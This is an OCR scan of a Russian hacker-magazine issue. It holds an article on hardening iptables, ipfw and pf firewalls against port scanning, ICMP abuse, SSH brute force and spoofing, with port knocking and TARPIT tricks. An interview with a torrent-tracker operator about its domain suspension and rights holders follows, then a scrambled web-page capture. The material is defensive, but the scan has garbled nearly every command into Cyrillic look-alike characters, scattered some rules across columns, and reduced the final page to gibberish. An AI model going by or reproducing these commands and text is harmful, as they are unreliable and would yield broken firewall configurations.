новленными флагами РШ, РЗН и ШС; 
-зЫ — сканирование пакетами без ус- 
тановленных флагов . 

Метод защиты от сканирования прост и 
известен любому системному администрато- 



ру. Заключается он в простом закрытии всех 
сервисов, которые не должны быть видны из 
внешней сети. Например, если на машине рабо- 
тают сервисы ззЬ., затЪа и арасЬе, а из внешнего 
мира должен быть виден только веб-сервер с 
корпоративной веб-страницей, то межсетевой 
экран может быть настроен так: 

Начальная настройка ірІаЫез 

оиДі Д= " еДкІ " 
ірДаЫез -Р 

ІрДаЫез -і $оиДіД -А ШРІЛ \ 

-ш соппДгаск \ 

--сДзДаДе ЕЗТАВЫЗНЕБ , КЕЬАТЕБ \ 

-3 АССЕРТ 

ІрДаЫез -і $оиДіД -А ШРІЛ 1 -р Дер \ 
— брогД 80 -3 АССЕРТ 
ІрДаЫез -і $оиДі Д -Р ШРІЛ БКОР 
ІрДаЫез -і $оиДі Д -Р ОІЛРІЛ АССЕРТ 

Начальная настройка ірГѵѵ 

оиДі Д= " г10 " 

ірілл абб аііом ір Дгот апу До апу \ 
ѵіа ІоО 

ірДм абб аііоѵі ір Дгот те До апу \ 
ѵіа $оиДіД 

ірДѵ^ абб аііом Дер Дгот апу До те \ 
езДаЫізЬеб ѵіа $оиДіД 
ірДѵ^ абб аііом Дер Дгот апу 80 \ 

До те ѵіа $оиДіД 

ірДм абб бепу ір Дгот апу До апу \ 
ѵіа $оиДіД 

Начальная настройка р{ 

оиДі Д= " г10 " 
зеД зкір оп ІоО 
Ыоск аіі 

разз оиД оп $оиДіД Дгот $оиДіД \ 



До апу кеер зДаДе 
разз іп оп $оиДіД ргоДо Дгот апу \ 

До $оиДіД рогД 80 

Все три набора правил делают одно и то же 
— разрешают прохождение любого трафика 
по интерфейсу обратной петли (ІоорЪаск), 
разрешают принимать пакеты уже установлен- 
ных соединений (чтобы, например, браузер 
мог получить ответ на запрос к удаленному 
серверу) , разрешают обращения на 80 -й порт, 
блокируя все остальные, и разрешают любые 
коннекты наружу. Обрати внимание, что если в 
примерах ірііаЫез и ірй/ѵ мы явно задали правила 
для разрешения приема пакетов уже установ- 
ленных соединений (езгаЫізЬесІ), то в случае с рі 
для этого достаточно было указать «кеер згаге» 
в рулесете, разрешающем любые исходящие 
соединения. 

В общем-то, такая схема защиты сетевых 
сервисов от сканирования и проникновения 
отлично работает, но мы можем пойти дальше 
и настроить файер так, чтобы некоторые виды 
сканирования вообще не могли бы быть вы- 
полнены. Технически мы не можем сделать это 
в отношении обычного сканирования (флаги 
птар '-зТ', '-зЗ' и ’-зИ’) просто потому, что в нем 
нет ничего криминального, однако нестандарт- 
ные типы сканирования, такие как '-зК, '-зР' 
и '-зХ', порождают пакеты, которые никак не 
могли быть созданы легальными приложени- 
ями. Поэтому без тени сомнения отбрасываем 
подобные соединения. 

Методы борьбы с экзотическими 
видами сканирования 

# Запрет ЕШ- сканирования 
Ьіпих> ірДаЫез -А ШРІЛ 1 -р Дер \ 
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-ш кср \ 

— кср-ІІадз РІБ,АСК РШ -3 БЕОР 

РгееВЗБ> іріім аск! гезесб Рср Ігот апу ко апу \ 
пор езкаЫізЬесі ксркіадз кіп 

# Запрет X- сканирования 

Біпих> іркаЫез -А ІБРБТ -р кср -ш кср \ 

--кср-кіадз РІБ , ЗУБ , ЕЗТ , Р 8 Н , АСК , БЕС 

РІБ,5УБ,Е8Т,РЗН,АСК,БЕО \ 

-з БЕОР 

РгееВЗБ> іркм асісі гезеск кср кгот апу ко апу \ 
ксркіадз Ріп, зуп, гзк, рзк, аск, игд 

# Запрет Б- сканирования 

Ьіпих> ірРаЫез -А ІБРБТ -р Рср -ш Рср \ 

— кср-кіадз РІБ, ЗУБ, ЕЗТ, Р 8 Н, АСК, БЕС БОБЕ -3 БЕОР 

РгееВЗБ> іркм асісі гезеск Рср Ргогп апу Ро апу \ 

РсрРІадз !Ріп, !зуп, ’гзР, ’рзіі, ’аск, !игд 

В ОрепВЗБ все эти строки можно заменить простой записью в начале 
/еіс/рі.сопі: 

зсгиЬ іп аіі 

Директива зсшЪ активирует механизм нормализации пакетов, при 
котором фрагментированные пакеты воссоединяются, а пакеты с не- 
допустимой комбинацией флагов отбрасываются. Кроме экзотических 
видов сканирования зсшЪ позволяет защититься и от обмана систем 
обнаружения вторжений (посылка сильно фрагментированных пакетов) 
и некоторых видов БоЗ-атак. 

Ддя защиты от ЗУІЧ/АСК-сканирования, инициируемого с помощью 
птар-флага '-зЗ', мы можем использовать метод пассивного определения 
ОС (05 Ріп^егргіпі:) , доступный в брандмауэрах рі и іріаЫез/пеііікег 
(начиная с версии 1.4.6) . Во время проведения обычного сканирования 
(флаг ’-зТ) птар использует стандартный интерфейс сокетов операцион- 
ной системы, поэтому такой скан почти ничем не отличается от потока 
обычных пакетов (ниже мы рассмотрим некоторые его отличия), однако 
при ЗУМ/АСК-сканировании птар формирует пакеты самостоятельно, 
поэтому они имеют некоторые черты, которые выдают их источник. Ме- 



тод пассивного определения ОС позволяет идентифицировать эти пакеты 
и отбросить их с помощью стандартных правил файервола: 

ОрепВЗБ> Ыоск іп диіск кгот апу оз ЕМАР 

Біпих> іркаЫез -I ІБРБТ -р кср -т озк --депге БМАР \ 

Щ БЕОР 

Модуль озі брандмауэра іріаЫез/пеШкег использует базу «отпечатков», 
собранную и обновляемую разработчиками ОрепВЗБ (/еіс/рі.оз), 
поэтому оба этих правила должны привести к одинаковым результатам. 
Интересно также и то, что они позволяют эффективно противодейство- 
вать функции определения ОС утилиты птар (флаг '-О') . 

Теперь мы защищены почти от всех видов сканирования, кроме 
стандартного и тупого '-зТ. Как быть с ним? На самом деле все 
просто. Факт сканирования портов легко заметить, просто проана- 
лизировав логи файервола. Если за короткий промежуток времени 
происходило множество коннектов на различные порты — зна- 
чит, нас сканировали. Осталось только переложить эту идею на 
правила брандмауэра. Для ірііаЫез есть отличный рецепт, который 
блокирует всех, кто слишком настойчиво стучится в нерабочие 
порты: 

Борьба со сканированием с помощью ірІаЫез 

# Проверка на стук в нерабочие порты (10 в час) 
іркаЫез -А ІБРБТ -ш гесепк --гскеск \ 

--зесопбз 3600 --Мксоипк 10 --гккі -3 ЕЕТБЕБ 

# Вторая проверка на стук в нерабочие порты (2 в минуту) 
іркаЫез -А ІБРБТ -т гесепк --гсііеск \ 

--зесопбз 60 --Мксоипк 2 --гккі -3 ЕЕТБЕБ 

# Заносим адреса стучащихся в список 
іркаЫез -А ІБРБТ -ш гесепк --зек 

# Отбрасываем пакеты всех, кто превысил лимит на 
количество подключений 

іркаЫез -Р ІБРБТ -3 БЕОР 

Установив пакет хііаЫез-асісіопз, содержащий наработки проекта раисЬ-о- 
тайс, мы получим доступ к модулю РЗБ (Рогі Зсап Беііесі:), реализованно- 
му по образу и подобию демона зсап1о§с1. Все предьщущие строки могут 
быть легко заменены простым правилом: 
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ГігеѵѵаІІ 

Файервол какой есть 




# іркаЫез -А ШРОТ? -ш рзб Ы БЕОР 

К сожалению, в пакетных фильтрах ірй/ѵ и рі 
ничего подобного нет, но это не беда, потому как 
сканированию портов хорошо противодейству- 
ет демон РогіЗепігу и тот самый зсап1о§б. 

ЗАПРЕТ 1СМР-С00БЩЕНИЙ 

Хорошей практикой также является запрет 
ІСМР-сообщений, которые могут выдать 
дополнительную информацию о хосте или 
быть использованы для выполнения различных 
злонамеренных действий (например, модифи- 
кации таблицы маршрутизации) . Ниже при- 
ведена таблица со списком возможных типов 
ІСМР-сообщений : 

Типы ІСМР-сообщений 

О — ескю геріу (есЪ.о-ответ , пинг) 

3 — безЫпакіоп шігеасйаЫе (адресат 
недосягаем) 

4 — зоигсе диепсЬ. (подавление ис- 
точника , просьба посылать пакеты 
медленнее) 

5 — гебігеск (редирект) 

8 — есію гедиезк (есію-запрос , пинг) 

9 — гоикег абѵегкізетепк (объявление 
маршрутизатора ) 

10 — гоикег зоіісікакіоп (ходатайс- 
тво маршрутизатора) 

11 — Ыте-ко-1іѵе ехсеебеб (истече- 
ние срока жизни пакета) 

12 — ІР йеабег Ъаб (неправильный ІР- 
заголовок пакета) 

13 — кітезкатр гедиезк (запрос зна- 
чения счетчика времени) 



14 — кітезкатр геріу (ответ на запрос 
значения счетчика времени) 

15 — іпкогтаЫоп гедиезк (запрос 
информации) 

16 — іпкогтакіоп геріу (ответ на за- 
прос информации) 

17 — аббгезз шазк гедиезк (запрос 
маски сети) 

18 — аббгезз шазк геріу (ответ на 
запрос маски сети) 

Как видишь, ответ на некоторые ІСМР-сообще- 
ния может привести к разглашению некоторой 
информации о хосте, в то время как другие 
— привести к модификации таблицы маршру- 
тизации, поэтому их необходимо запретить. 
Обычно выход во внешний мир разрешают 
ІСМР-сообщениям 0, 3, 4, 1 1 и 12, в то время как 
на вход принимают только 3, 8 и 12. Вот как это 
реализуется в различных брандмауэрах: 

Запретопасных ІСМР-сообщений 

Ыпих> іркаЫез -А ШРОТ? -р істр \ 
-істр-куре 3,8,12 -3 АССЕРТ 
Ышх> іркаЫез -А ОБТРОТ? -р істр \ 
-істр-куре 0,3,4,11,12 -3 АССЕРТ 

ЕгееВ 8 Б> ірШ абб аііоѵ^ істр \ 
кгот апу ко $оикік іп \ 
ѵіа $оикік істркуре 3,8,12 
ЕгееВ 8 Б> ірЫ абб аііом істр \ 
кгот $оикік ко апу оик \ 
ѵіа $оикік істркуре 0,3,4,11,12 

ОрепВ 8 Б> разз іп іпек ргоко істр \ 
кгот апу ко $оикік \ 



Борьба с утечкой ресурсов 

При использовании действия ТАКРІТ обязательно добавляй в конфиг следующее 
правило, иначе «провисшие» соединения будут съедать ресурсы при обработке 
подсистемой соппігаск: 

# іркаЫез -1 гаі/ѵ -I РКЕКСШТШ6 -р Іср -йрог* 25 1 ѴОТКАСК 
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для настройки ірІаЫез, ірЬ/ѵ, рі и 
ірі 



істр-куре { 3 , 8 , 12 } кеер зкаке 
ОрепВ 8 Б> разз оик іпек ргоко істр \ 
кгот $оикік ко апу \ 
істр-куре { 0, 3, 4, 11, 12 } \ 
кеер зкаке 

При желании ты можешь запретить весь ІСМР- 
трафик, включая пинг-запросы, но это может 
повлиять на корректность работы сети. 

БРУТФОРС 

Разведав информацию об открытых портах и 
ОС, взломщик предпринимает попытки про- 
никновения в систему, которые могут быть ос- 
нованы на эксплуатации дыр в сервисах, либо на 
подборе паролей. Предотвратить возможность 
взлома сервисов брандмауэр нам не поможет, 
однако затормозить процесс перебора паролей 
— легко. Для этого применяются возможности 
по ограничению количества пакетов, пришед- 
ших на машину с одного ІР-адреса. Вот как это 
можно сделать с помощью ІрІаЫез : 

Защита от брутфорса 
с помощью ІрІаЫез 

# Цепочка для проверки соединений 
іркаЫез -Н Ъгике_сЬ.еск 

# Блокировка адреса, если за 60 
секунд он инициировал более 2 -х со- 
единений 

іркаЫез -А Ьгике_скеск -т гесепк \ 
--ирбаке --зесопбз 60 \ 

--Ыксоипк 3 -3 БЕОР 

# Если нет — разрешаем соединение и 
заносим адрес в список 

іркаЫез -А Ьгике_скеск -т гесепк \ 
--зек -3 АССЕРТ 

# Очищаем цепочку ШРОТ? 
іркаЫез -Г ШРОТ? 

# Отправляем в цепочку Ьгике_сЬеск 
всех, кто пытается подключиться к 
22 -му порту 

іркаЫез -А ШРОТ? -т соппкгаск \ 
--скзкаке БЕМ -р кср \ 

--брогк 22-з Ьгике_скеск 
іркаЫез -Р ШРОТ? БЕОР 

То же самое можно проделать и с использова- 
нием рі: 
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5ѴМ/АСК 



/зЬіп/іріаЫез -А ІМРІЛ" -і екЬО -р ісаір --іепар-іуре ебіо-геріу АССЕРТ 
/зЬігі/іріэЬІез А 1№ЦТ -і екііО -р іеиір '-ісіпр-іуре есііо- гечиезк АССЕРТ 



# Ікр 

/аЬіи/іргаЫеЕ 

/зЬіп/іріаЫез 

а ззН 

/зЬіп/іріаЫез 

/зЬігі/іріаЬІен 

# нш 

/зЬіп/ірі аЬ1е5 
/еЬігт/ір 1: а ЬТ е г 

# ЫПрь 

/зЬіп/іріаЫез 

/зЬіп/іріаЬІез 



-А 1№1ГГ -р 'Сер 
-А ІНРЦТ -р исір 

-А ХИРШ -р ѣер 
-А ІМРШ -р ийр 

-А ІМРШ -р кер 
■А ІІЧРЦГ ‘р и<1р 

‘А інрит р іер 
-А Щрцг -р исір 



-і екНѲ - -еірагі 
■і --сГрогС 

-і екИО ■ -сірогі: 
-і екЬФ - -сГрап: 

-і екН0 --гірогЕ 
■і еіЩ0 -сірогі: 

-і еіМ ■ -йрогі 
-і екЬй --Драг* 



21 -і АССЕРТ 

21 -1 АСШ*Г 

22 -] АССЕРТ 
22 -і АССЕРТ 

ЗѲ О АССЕРТ 
ВѲ щ АССЕРТ 

443 } АССЕРТ 

443 АССЕРТ 



# Не легировать пакеты от маршрутизаторов 

/зЬіп/іргаЬІез -А ІМРШ -р исір і еіМ - сірогі 520 щ ЯЕ1ЕСТ 



# Не легировать пакеты зліЬ/ыігкІоыз 

/зЬіп/іріаЬгез -А ІИРЦТ р Тер -і еТЬО --сГрог* 137 еШ -3 РШЕСТ 
/зЫп/іріаЫез -А ІІЧРІІТ р исір -і еіН0 -брогі 137:139 з ВНЕСУ 



Настраиваем ірІаЫез 




> ѵѵагпіпд 

Явно блокируя пакеты 
птар с помощью озб 
ты рискуешь отсечь 
пакеты легальных ОС, 
имеющих сходную 
сигнатуру: 5ип05 4.1.x, 
Тги64 6.1 , ТОР5-20 
ѵегзіоп 7, ЕхІтетеѴѴаге 
4.x, 5утЬіап05 6048, 
5еда ЭгеатсазІ 
ОгеаткеуЗ.О. 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

зі.пеі/ргоіесіз/ 
зепігѵіооіз — 
РогіВепІгу 
\л/\л/\л/.ореп\л/аЦ.сот/ 
зсапіодб — зсапіодб 




> іпіо 

Способы защиты от 
атактипа Эо5/ЭЭо5 
подробно описаны 
в моей статье «Усто- 
ять любой ценой», 
опубликованной 
в сентябрьском номе- 
ре ][ за 2009 год. 



Защита от брутфорса с помощью р{ 

# Создаем таблицу для брутфорсеров 
каЫе <Ъгикекогсегз> регзізк 

# Блокируем всех, кто в нее попадает 
Ыоск іп диіек кгот <Ъгикекогсегз> 

# Помещаем в таблицу Ъгикекогсегз всех, кто 
инициирует более двух соединений на 22-ой порт 
в минуту 

разз іп оп $ехб_іб іпек ргоко Сер Со $оикік \ 
рогк 22 кіадз 8/8А кеер зкаке \ 
(тах-згс-сопп-гаке 60/2, \ 
оѵегіоаб <Ъгикекогсегз> кіизк) 

Брандмауэр ірБ/ѵ не обладает достаточной функциональ- 
ностью для эффективного противодействия брутфорсерам, 
поэтому его пользователи должны использовать инструмен- 
ты более высокого уровня, такие как специальные модули 
РАМ, системы обнаружения вторжений и программы вроде 
ззЬ^иагб. 

СПУФИНГ 

Спуфинг (подмена адреса отправителя пакета) может быть 
использован для осуществления Эо5-атак или обхода бран- 
дмауэра. В первом случае спуфинг дает огромное преиму- 
щество атакующему, так как существенно затрудняет реак- 
цию на атаку (пакеты, приходящие с совершенно разными 
адресами отправителя, не так просто классифицировать 
и заблокировать) и затягивает процесс закрытия новых 
соединений (обычно поддельный адрес недостижим, поэ- 
тому закрытие соединения происходит лишь по истечению 
таймаута) . Спуфинг, осуществляемый для обхода системы 
защиты, менее опасен и в большинстве случаев поддается 
контролю. 

Достаточно часто, блокируя внешние сетевые сервисы хоста, 
системные администраторы оставляют их открытыми для 
определенного диапазона адресов (например, для подклю- 
чения со своей домашней машины) . Вычислив один из этих 
адресов, взломщик может сформировать пакет, указав этот 
адрес в качестве обратного, и таким образом «просколь- 
знуть» через брандмауэр. Далее он может угадать номера 
последовательности ТСР-пакетов и сделать так, чтобы 
доверяющий обратному адресу сервис выполнил нужное ему 
действие. Это очень трудная в реализации атака, которая, 
тем не менее, может быть выполнена грамотным специа- 
листом, а если речь идет о протоколе ІГОР, то это под силу и 
кулхацкеру. 



МЕТШОЯК 




Схема прохождения пакета через под 
систему пеіііііег ядра Ыпих 



К счастью, защититься от подобных атак легко. Достаточно 
не открывать порты незащищенных сервисов во внешний 
мир, а в случае резкой необходимости использовать защит- 
ные системы самих сервисов (например, сертификаты ззЬ) 
или механизм «стука в порты» (о нем рассказано в конце 
статьи). 

Ситуация становится более сложной, когда дело каса- 
ется сетевого моста, разделяющего внутреннюю и вне- 
шнюю сети (или две локальных сети) . Доверительные 
отношения внутри локальной сети — обычное дело. Сер- 
висы доступны всем, никакой аутентификации, шифро- 
вания и т.д. — просто лакомый кусочек для взломщика. 
Находясь во внешней сети, он может узнать сетевую 
маску внутренней сети и сформировать пакеты с со- 
ответствующим ей обратным адресом, что приведет к 
получению доступа ко всем ресурсам локалки. Это дейс- 
твительно опасная ситуация, но ее легко предотвратить 
с помощью правильной настройки брандмауэра или ОС. 
Для этого достаточно запретить прохождение пакетов, 
обратные адреса которых соответствуют используемым 
во внутренней сети, с внешнего интерфейса: 

Біпих> іркаЫез -А ШРШ? -і $оикік \ 

-з 192.168.1.0/24 -з БЕЫУ 
РгееВ8Б> ірім абб бепу ір кгот \ 

192 . 168 . 1 . 0/24 ко апу ѵіа $оикік 
ОрепВ8Б> Ыоск іп оп $оикік кгот \ 
192.168.1.0/24 ко апу 
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(пеійііе?) 





іІ«і№ ! - 1 ? ІІ^іИ-Г 




В# » 1 О Дн^тгі. 



|та|аІП1Іш|кшді«|іцйдаІЕІдіцл 



ѴЯіэГ із пеіЛІІБГ.огд? 

тгіы ѵо і* к» ій* мд**« а а* р*а* ітлвд тгдиичсл. іічі» ич 2 * * яга зе* 

кѳігві «е гінгі йаПиш® еогппюпѴ кжіяіні ш№ гмЯіЬвгогр іи . : 

5сЛмга іпавв Ши ПятіммЛ егвЫеб рэскйіі Полир. пйитѴ мИгеББ [впй рсгі) (гвпьйОсп <№А[Р|Т] 
лпв йП* гтчпдкпд П \і іГч І*4К4дПбй шМ Гч№іІГ ітрѴУМ) ИКИКѴ ОТ №■ Ѵ*Чоиі ІдИле 

32 т іи ■• ■ V апа ила 2 йх ІС ЫЙЕ ІѵИіті 

інКГіІегіБ а зжагінцьаігчіфііиипш к «Ий № ейдо кеты пниц іа гадій* иЛккГІлаіѴЧ 
імиі «ч поьцик ^к А ’ЧМШ'й св*«к ИяЯоп і* іьиі еша Ы>±к кк *»*гу рмк* ш* ігмнаі 
Пк гвармЯѵе (н»к мВнп Ше пйиѵк йэск 

ІрІяоЖ І4 а аопэпе (лЫе Яшйига кх іге оЫіпІют <А піеьйь ЕгеП Ше ™іГіп оп ІР ЬвМѳ сѵгенй сі о 
ПЛ1Ё4Г ^ СІЯИПІГІ [і рТО ЬЧі (тШСПП^ №4 ІКЧ СѴЮОСМІІ ДсОЭД [ірЫіЫк 1 Ѵр#0 

ГЧ№1*. Ф_1*Ы«. МПЧСІІ VI ткьіпд |ір_«п***. лЦннфкк} ѴЯ №» ЧАТ а**уЙо*і ІОЗЛѴ 
бшН Пн я^аг раШ оГ Н* Итимвгк 

ІѴіаіп реаПігеб 

- ѵтюі. |ЖК41 ІПЙППв р*А «Н РкЩ 

* йвініы рмкй ПІйііпд ѵні &Мб| 

* вікіггія ^пй^каМгиБз^іроіІІгапйвІіоп. ад МА.Т1 МАРТ (Рѵ4 оп^ 

- П^№*гі«і4^ЬкпііАеОТ*іѵ«і 

- тЛрЧЧ^гі^АРГ4Іѵ^Р«1Ѵ»і1миіап 

< Іядв гиль» & рШ9пь*псиИег5.керІ: іп ^вЮимпайс' щхгаіішу 

ѴѴНаІ сап I сіо уѵЦН п«Ш1»гЛріаЫ«8? 



ѵѵѵѵѵѵ.пеНіІег.огд: представительство ірІаЫез/ 
пеНіІегвСети 



В качестве альтернативы или дополнительной меры защиты можно (и 
даже нужно) использовать специальные директивы ірй/ѵ и ріи настройки 
ядраііпих: 

Ыпих> есЬо 1 > /ргос/зуз/пек/ірѵ4/соп:Е/а11/гр_і:і1кег 
ЕгееВ 8 Б> ірШ асМ сіепу ір Ігот апу Во апу пор апРізрооР іп 
ОрепВ 8 Б> апРізрооР диіск Рог $ехР_іР 

Эти три команды приводят к одинаковым результатам. Все пакеты, 
обратные адреса которых соответствуют маске сети другого интерфейса, 
отбрасываются. 

ПОЛЕЗНОСТИ ІРТАВІ.Е5 

В конце статьи мы рассмотрим несколько интересных возможностей 
іріаЫез/пеСйкег, которые могут оказаться полезными при защите 
сервера от проникновений. Начнем с механизма удаленного управления 
брандмауэром, получившего имя «стук в порты» (роіт кпокіп§) . Суть его 
заключается в том, чтобы заставить файервол выполнять определенные 
действия после подключения к заданному порту. Ниже приведен пример 
правил, открывающих порт 55Н на 10 секунд после «стука» в 27520-ый 
порт: 

ірВаЫез и рогк кпоскіпд 

# Цепочка для проверки соединений на защищаемый порт 
ірВаЫез Ш кпоск 

# Разрешаем соединение , если стук был в течение последних 
10 секунд 

ірбаЫез -А кпоск -ш гесепР --гскеск --зесопбз 10 \ 

-3 АССЕРТ 

# Очищаем ШРІІТ 
іркаЫез -Р ІЫРбТ 

# Разрешаем все, что относится к уже установленным соеди- 
нениям 

ірРаЫез -А ШРШ7 -ш соппРгаск \ 

--СРзРаРе Е 8 ТАВЫ 8 НЕБ , КЕЬАТЕБ -3 АССЕРТ 

# Все попытки открыть соединение с 22-м портом отправляем 
на проверку в цепочку кпоск 

іркаЫез -А ІЫРІІТ -ш соппРгаск --сРзРаке ЫЕМ \ 

-р Рср --брогк 22 -3 кпоск 

# Заносим адрес стучащегося в 27 520-й порт в список 
ірРаЫез -А ШРІЛ 1 -ш соппРгаск --сРзРаке ЫЕШ \ 

-р Рср --брогк 27520 -ш гесепк --зеР 



паг-апсіюг "Ир-ргоху/** 1 
гйг’апсііог "ТСр-ргоху/*' 1 

г^г рЭ5з оп іілС рпо*о іср Ій рогі -> 127. В. 0.1 роП 8Й21 
г^г оп ргоіо іср Тгоя апу іо апу рогі 80 -> 

ЫойЬ іп 

разз оиі кеер зіаіе 

апіИог "«р-рго*уЛ* 

апіазрооі чиіск Тог { Ір >ішу > 

разз іл оп и_і* ігві ргоіо іср Тгов апу іо ( . ,ѵ_іТ) \ 
рогі »тср_^егѵіс^! Падз 5^54 кеер зіаіе 

разз іл оп іпеі ргоіо іср Тго» алу іо $сотрЗ рогі 6Й \ 

Тіадз 5/5А зупрпоху зіаіе 



раза іп іпеі ргоіо ісщі а щ ісвр-іуре кеер эіэіе 




Настраиваем 



# При стуке в соседние порты удаляем адрес из списка 
ірбаЫез -А ІЫРЮТ -ш соппДгаск --скзкаке ЫЕШ -р кср \ 

-ш шиікірогк --брогк 27519,27521 -ш гесепк --гетоѵе 

# Запрещаем все 
іркаЫез -Р ІЫРбТ БКОР 

Третье с конца правило добавляет адрес стучащегося в список. Если та 
же машина в течение 10 секунд после стука обратится к 22-му порту, 
соединение будет установлено. Предпоследнее правило — защита от 
«перебора стука». Если злоумышленник попытается стучать последо- 
вательно во все порты с надеждой, что один из них откроет 22-й порт, 
сработает это правило, и его адрес будет удален из списка сразу после 
попадания в него. 

Вторая полезность ірііаЫез распространяется в пакете хшЫез-асЫопз 
(ращЬ-о-тагіс) и носит имя ТАКРІТ. Это действие (такое же, как АССЕРТ 
или БЕОТ), которое «подвешивает» соединение, не позволяя атакующей 
стороне его закрыть. Соединение, пакеты которого попадают в ТАКРІТ, 
будет благополучно установлено, однако размер окна будет равен нулю, 
благодаря чему удаленная машина не сможет отправлять данные, 
расходуя свои ресурсы, а соединение будет закрыто только по истечению 
таймаута. ТАКРІТ можно использовать в экстренных случаях для защиты 
отБоЗ: 

# ірбаЫез -А ШРЦТ -р Рср -т Рср -брогб 80 -3 ТАКРІТ 

Или же для введения атакующего в заблуждение и борьбы против скане- 
ров портов (только обычное ТСР-сканирование, '-зТ') : 

# ірбаЫез -А ШРІІТ -р Рср -т Рср --брогб 8 0 -3 АССЕРТ 

# ірбаЫез -А ШРІІТ -р Рср -т Сер --брогб 2 5 -3 АССЕРТ 

# ірбаЫез -А ШРІІТ -р Рср -т Сер -3 ТАКРІТ 

Эти правила создают видимость системы, в которой открыты все порты, 
однако при попытке подключения к любому из них (кроме 80 и 25) соеди- 
нения будут «подвисать». Того же результата, но без «провисших» соеди- 
нений, можно добиться с помощью действия ЭЕЫГОЕ, которое правильно 
отвечает на все попытки инициации соединения, но посылает К5Т-пакет в 
ответ на все остальные пакеты. Для еще большего запутывания атакую- 
щего ты можешь использовать действие СНА05, которое случайным 
образом активирует одно из двух описанных выше действий. 

ВЫВОДЫ 

Обладая достаточным количеством знаний и вдумчиво читая документа- 
цию, ты можешь создать очень крепкий бастион, к которому будет не так- 
то просто подобраться. Современные брандмауэры, а в особенности рі и 
ірііаЫез, предлагают множество средств защиты от непрошенных гостей, 
которые ты можешь получить абсолютно безвозмездно. "»" 
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ІЛЧІТ5 



Мария «МИтіІІ» Нефедова ті^гіШВгеаІ. хакер. ги 




С момента приостановки делеги- 
рования домена и вашего переезда 
на гиітаскег.ог^уже прошло некоторое 
время. Тогда, непосредственно после 
инцидента, вы собирались оспаривать 
действия прокуратуры и «Ру-Центра», как 
неправомерные. Было ли что-то сделано в 
этом направлении и если да, то как успехи? 

Действия прокуратуры мы не собирались 
оспаривать, т.к. прокуратура ничего не 
приостанавливала, а лишь «рекомендовала». 
Адействия Ру-Центра, который судоволь- 
ствием воспринял незаконные рекомендации 
как приказ кдействию будем. В настоящий 
момент ведется юридическая работа, которая 
нацелена на достижение максимального 
результата. 

У многих создалось впечатление, 
что вы перебрались на новый до- 
мен очень оперативно, будто знали о том, 
что произойдёт заранее. Вас предупре- 
дили, или же вы просто рассчитывали, что 
рано или поздно нечто подобное может 
случиться и имели отработанные «пути 
отступления»? 

Действительно, информация отом, что 
правоохранительные органы будут писать в 
«Ру-Центр» по поводу блокировки домена у 
нас была. Но всерьез возможность блокиров- 
ки никто не воспринимал — отбирать домен- 
ное имя в целях «обеспечения производства» 
по уголовному делу против пользователя, 
посещавшего этот домен — это нонсенс даже 
для нашей страны, (что, кстати, признал и сам 
«Ру-Центр»]. Однако на всякий случай за- 



регистрировали гтЩ^скегощ— и, как видите, 
домен пригодился. 

На старом домене было запре- 
щено выкладывать некоторые 
продукты, и с переездом на ги1гаскег.ог§ 
в этом отношении ничего не изменилось. 
Ждут ли нас какие-то перемены в дальней- 
шем, или вы не собираетесь менять свою 
политику в отношении общения с право- 
обладателями и пересматривать догово- 
рённости с ними? 

Наша политика по отношению к правооблада- 
телям не менялась и меняться в ближайшее 
время не будет. Несмотря на то, что контро- 
лировать файлообмен в интернете в общем 
случае невозможно, однако в определенных 
случаях можно сдерживать распространение 
информации, в основном свежей — фильмы, 
игры, программы и т.п. Это позволяет про- 
изводителям окупить расходы и получить 
прибыль. Послетого каксрококупаемости 
прошел, контроль со стороны правообладате- 
лей как правило ослабевает, и пользователи 
этим пользуются. Мы стараемся следовать 
тому же принципу: «все, что не запрещено — 
можно». 

По некоторым вашим коммента- 
риям прессе сложилось впечат- 
ление, что физически ваши серверы рас- 
положены далеко не в России, так ли это? 

Нетолько серверы, нотеперь и домен. Ксожа- 
лению, втом правовом поле, в котором сейчас 
находится Россия, невозможно решать такие 



сложные вопросы какохрана авторских прав, 
вопросы разграничения ответственности 
пользователя, провайдера и владельца 
ресурса, защиты собственности, и многие 
другие, которые требуют высочайшей юри- 
дической квалификации. Недавняя история 
с доменом Іоггепіз.ги и серверами ііюісіег-а 
— тому подтверждение. Ни у правоохрани- 
тельных органов, ни у судебной власти нет 
возможности качественно расследовать дела 
связанные с нарушениями в области высоких 
технологий. При этом создается такое впе- 
чатление, что правоохранительные органы 
вмешиваются в жизнь интернета исключи- 
тельно по «звоночку сверху» и исключительно 
в карательных целях, безотносительно их 
законности и соразмерности. 

Как часто к вам вообще общаются 
правообладатели, и бывает ли, 
что обращаются с угрозами? Случались ли 
откровенные «наезды»? 

Обращаются часто. Ежедневно удаляется не- 
сколько десятков ссылок на раздачи. 

Что касается угроз — присылают довольно 
часто, но, как правило, они стандартные. 
Юристы некоторых компаний пишут много- 
страничные претензии, вместо того чтобы 
кратко описать суть проблемы приложив не- 
обходимые документы. Бывает, грозят судом, 
однако ни одного судебного процесса против 
нашей компании еще не было. 

Вообще прослеживается такая закономер- 
ность — чем больше угроз, тем ниже правовая 
грамотность написавшего. Некоторые вообще 
не понимают, что имеют дело со ссылками на 
информацию, требуя удалить то, чего у нас 
физически не существует. 
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Г плана* • Тртгр Пасек • Пряіила ГМ} - ЛС ■ Груяпм Длв пваавабпадятслѵД 




Г яткстр •€*•■» • мт [“ 



I а»»» I 




О^МІ г ми ар* гргпгмі «Тап 

Коттгиаы /мльаого Гостдарсіааммого Тааіоа Эсюады (г. Екатаримбірг) 
іг-м* ІпЛш-п/тш Тіпвѵш и СЬміа РяоЫ* 

К-*а Сагодиа руДягч шик. М4к> Чача и Іаи2о6«с прсдстмлтот сеем моема пластики 
12-к* но**» «гдпошчг* Длитри* Гпуховстогр, а *а*жа с—жнй мгп а* гртпгы Тообв-нй-йдтп— 

Новости 

<3) Пароаад иа новый доном - проблемы и ратания 



** • Обюры 

Вопросы по исполяюаамию форума и трокаре 

§) Правила, осноямыо инструкции, РАО* 
д Вопросы по форуму и і рекору 

• Пр*длом«нм л* ултчи ч ипс фортп* и ірм*«в» • Угнали мгкі 

Вопросы по ВКТогтяпІ сати и ом клиентом 



МТаттЫЯ 4л, *-», *» • ѴЧіІ* (стаем «*»*««• - Аютѵт) • ОЛСое 

Обсуждение проо лидеров 



.і 



Авторские роідочи 

• [діднасииш] ІжтааСелпа - 



■XXV лет ■ одной пока** (ГОЮ г, 
Аесй'ОѴО») 

• (СвОмЛІОДО»] Цпго«І б >««м 

йоп • Прм>р*г Опоры яло Йо м»и 
Хыктииы До (20X0) 
о (Тгапсо) ѴаіТ Имел • Сборни. 
